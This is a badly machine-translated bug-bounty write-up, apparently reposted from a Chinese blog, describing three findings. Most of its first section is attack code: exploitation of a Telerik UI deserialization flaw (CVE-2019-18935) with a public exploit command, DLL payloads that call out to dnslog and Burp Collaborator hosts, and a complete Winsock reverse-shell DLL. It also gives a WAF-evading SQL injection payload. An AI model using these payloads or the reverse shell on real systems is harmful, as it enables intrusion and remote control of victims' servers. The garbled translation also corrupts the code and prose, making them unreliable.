By HireHackking in HACKER
· 2 views
いくつかの抜け穴が最近掘られました。繰り返されていますが、参照値があります。ここであなたと共有させてください。
抜け穴を繰り返すことはまだ非常に不快です。あなたがそれについて考えるとき、人生は決して満足のいくものではありません。抜け穴を繰り返すことは、失敗を意味するものではありません。最初に来てから来ることが重要であり、外観の順序が重要です。
1.特定のサイトRCEは、ドメイン名:https://***。*** :8089/をテストするために私を連れて行ってくれた司祭に感謝しているスコープ著者の司祭に感謝しない理由を無視します。
CVE-2017-11357 CVE-2019-18935 CVE-2017-9248脆弱性が存在します
脆弱性エクスプロイトダウンロードアドレス:
https://github.com/noperator/cve-2019-18935
https://github.com/noperator/cve-2019-18935.git
遅延11S:SLOIP 11S:
テストコード:テスト
#windows.hを含めます
#include stdio.h
bool winapi dllmain(hinstance hinstdll、dword fdwreason、lpvoid lpresived)
{
if(fdwreason==dll_process_attach)
//スリープ(10000); //数百万秒単位の時間間隔。
睡眠(11000);
trueを返します。
}
test.cはAMD642.dllファイル
にコンパイルします
:python CVE -2019-18935.py -v 2017.1.228 -p Payloads \ amd642.dll -u https://**** :8089/telerik.web.ui.webresource.axd?Type=rau
最初のステップは正常に確認することです。成功遅延は約11秒、元のリクエストは2秒です
テストコマンド実行:
#windows.hを含む
#include stdio.h
bool winapi dllmain(hinstance hinstdll、dword fdwreason、lpvoid lpresived)
{
if(fdwreason==dll_process_attach)
system( 'cmd.exe /c nslookup rsmwe.dnslog.cn');
System( 'cmd.exe /c nslookup 2pstpep28u6vl9qrw0lhjwsr9if83x.burpcollaborator.net');
trueを返します。
} test.c AMD642.dllファイルにコンパイル
もう一度実行してDNSLOG:を表示します
直接リバウンドシェル、一般exp:
#winsock2.hを含む
#include stdio.h
#include windows.h
#pragmaコメント(lib、 'ws2_32')
#define host '{vps ip}'
#define port {port}
wsadata wsadata;
ソケットウィンソック;
ソケットソック;
struct sockaddr_in hax;
char aip_addr [16];
startupinfo ini_processo;
process_information processo_info;
//https://github.com/infoskirmish/window-tools/blob/master/simple%20reverse%20shell/shell.cからの適応
void reverseshell()
{
wsastartup(makeword(2、2)、wsadata);
winsock=wsasocket(af_inet、sock_stream、ipproto_tcp、null、0、0);
struct HOSTENT *host=gethostbyname(host);
strcpy(aip_addr、inet_ntoa( *((struct in_addr *)host-h_addr)));
hax.sin_family=af_inet;
hax.sin_port=htons(port);
hax.sin_addr.s_addr=inet_addr(aip_addr);
wsaconnect(winsock、(sockaddr*)hax、sizeof(hax)、null、null、null、null、null);
if(wsagetlasterror()==0){
memset(ini_processo、0、sizeof(ini_processo));
ini_processo.cb=sizeof(ini_processo);
ini_processo.dwflags=startf_usestdhandles;
ini_processo.hstdinput=ini_processo.hstdoutput=ini_processo.hstderror=(handle)winsock;
char *myArray [4]={'cm'、 'd.e'、 'x'、 'e'};
charコマンド[8]='';
snprintf(command、sizeof(command)、 '%s%s%s'、myarray [0]、myarray [1]、myarray [2]、myarray [3]);
createProcess(null、command、null、null、true、0、null、null、ini_processo、processo_info);
}
}
dword winapi mainthread(lpvoid lpparam)
{
Reverseshell();
0を返します。
}
bool winapi dllmain(hinstance hinstdll、dword fdwreason、lpvoid lpresived)
{
hthreadを処理します。
if(fdwreason==dll_process_attach)
hthread=createThread(0、0、mainthread、0、0、0);
trueを返します。
} 
許可は低くありません、それはドメインユーザー:です
2。SQL注入:背景紹介:友人が注射を送った。この注入は非常に難しいです。 XXクラウドのWAFがあり、バックエンドフィルターのコンマ、奇数と二重引用符、および通常の機能があります。私のアイデアは非常にシンプルで、16進数です。 regexp機能だけで、他のアイデアがあるべきだと思います。
(Case+When+Current_user+regexp+0x*+then+1+else+2*1e308+end)この方法では、データベースユーザーが作成されます。
ここで、声明の場合のケースについてお話したいと思います。声明が私たちが想像したよりもはるかに柔軟である場合。ここでメモを取り、について話します
最も一般的な:
異常なことを言って、私は2つのデモを書きます、そして私はそれを続け続けることができます:
2=2の場合、ケース1=1次に1=1 else 1/0 end
3.urlジャンプ +アイデンティティ認証トークンリーク:昨夜それを掘りました、そして、私が無視する理由は複製です。時々、私は一部のメーカーに非常に言葉を失い、脆弱性はそこにあり、彼らは修正されていません。それは私に幻想を与え、抜け穴を見つけ、ハニーポットを踏むという幻想を持っていました。資産範囲は:VC-*。xxx.comです
実際、私は簡単なファズを作ることができ、多くの資産を見つけたので、私はこの範囲に遭遇してとてもうれしいです。
1つずつ開いて視聴し、VC-Ss.xxx.comにアクセスしてサイトにアクセスし、直接ジャンプしてログインを求めます。
私は神ではなく、説明もありません。私はJSを見て、PATH情報へのアクセスが見つかりませんでした。
ファズから始めて、PHPであることがわかっている場合は簡単です。 FFUFを使用してPHP/API辞書を実行し、インターフェイス開発ドキュメント/API /***.htmlに実行します
インターフェイス開発ドキュメントの当初の意図は良好ですが、ほとんどのインターフェイス開発ドキュメントに関するスクリーンショット情報/インターフェイス情報は、二次脆弱性の搾取のリスクがある可能性があります。残念ながらテスト後、スクリーンショット情報はすべてプレーンテキストですが、ほとんどすべてのインターフェイスが401に直接アクセスできることがわかり、ID認証が必要であることがわかりました。私は少し無力でした。私があきらめたかったとき、私はいつも自分自身に読んだ後に慎重に読むように自分自身に言いました。私はインターフェイスドキュメントを見つめ続け、めくっていて、アイデンティティトークンリークやその他のセキュリティの脆弱性を見つけました。
私は抜け穴を提出し、朝:に重複したメッセージを受け取りました
オリジナルリンク:https://www.cnblogs.com/piaomiaohongchen/p/17130283.html
Recommended Comments